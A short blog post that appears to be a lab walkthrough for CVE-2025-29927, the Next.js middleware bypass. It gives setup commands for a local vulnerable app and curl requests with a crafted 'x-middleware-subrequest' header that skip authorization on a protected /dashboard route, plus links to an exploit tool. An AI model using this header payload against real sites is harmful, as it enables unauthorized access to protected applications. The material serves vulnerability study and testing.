CVE-2025-29927: Next.js Middleware Bypass Vulnerability

npm install

wget https://edgedl.me.gvt1.com/edgedl/chrome/chrome-for-testing/134.0.6998.117/linux64/chromedriver-linux64.zip
unzip chromedriver-linux64.zip
sudo mv chromedriver-linux64/chromedriver /usr/bin/chromedriver
sudo chmod +x /usr/bin/chromedriver


npm run dev

curl -H "x-middleware-subrequest: middleware" http://localhost:3000/dashboard
curl -v -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
http://localhost:3000/dashboard


https://github.com/AnonKryptiQuz/NextSploit/tree/main

https://github.com/strobes-security/nextjs-vulnerable-app








 

Post a Comment

Previous Post Next Post